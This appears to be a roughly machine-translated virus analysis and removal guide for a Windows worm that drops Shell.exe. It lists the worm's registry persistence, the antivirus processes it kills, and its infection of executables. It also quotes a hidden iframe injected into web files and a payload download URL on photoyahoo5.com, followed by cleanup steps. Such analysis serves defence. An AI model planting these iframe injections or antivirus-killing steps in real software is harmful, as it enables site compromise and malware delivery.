To modify the registry:
To create a startup project
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Shell.exe><C:\WINDOWS\system32\Shell.exe>
[Hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
is 0
Destroy display hidden files
Other actions
Stopping the Server service
Find software\\microsoft\\windows\\currentversion\\uninstall\\ Password anti-theft expert comprehensive registry entries
Delete it if found
Terminate the following process or close the window
Kvxp. Kxp
Kvmonxp.kxp
RavMon.exe
Ravmonclass
Tflockdownmain
ZoneAlarm
Zaframewnd
VirusScan
Symantec AntiVirus
Duba
Wrapped Gift Killer
IceSword
PJF (USTC)
Traversing a partition that is not system-partitioned. ASP. exe. com. pif. exe. ASPX. COM. Htm. Html. Jsp. PHP files
Infection. Asp
. ASPX
. COM
. Htm
. Html
. Jsp
. Php
File
Add <iframe src=http://www.photoyahoo5.com width=0 to the back of the Height=0></iframe > 's Code
infection. exe. com. pif. exe
Adding 64516 bytes of content to its head belongs to the file head parasitic infection
Connect network download Hxxp://www.photoyahoo5.com/tools/01.exe to C packing directory
Purge method:
1. In Safe mode: (Reboot the system long press F8 until the prompt appears, then choose to enter Safe mode)
Copy the following code into Notepad and save as a 1.reg file
Windows Registry Editor Version 5.00
[Hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"Regpath" = "software\\microsoft\\windows\\currentversion\\explorer\\advanced"
"Text" = "@shell32. dll,-30500"
"Type" = "Radio"
"CheckedValue" =dword:00000001
"ValueName" = "Hidden"
"DefaultValue" =dword:00000002
"Hkeyroot" =dword:80000001
"HelpID" = "shell.hlp#51105"
Double-click 1.reg to import this registry key
Double click on my Computer, tools, Folder Options, view, click to select "Show hidden files or folders" and clear the "Hide protected operating system files (recommended)" Front of the hook. When you are prompted to determine the changes, click Yes and then determine
and then delete
C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic
And the Shell.exe under each partition.
Autorun.inf
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.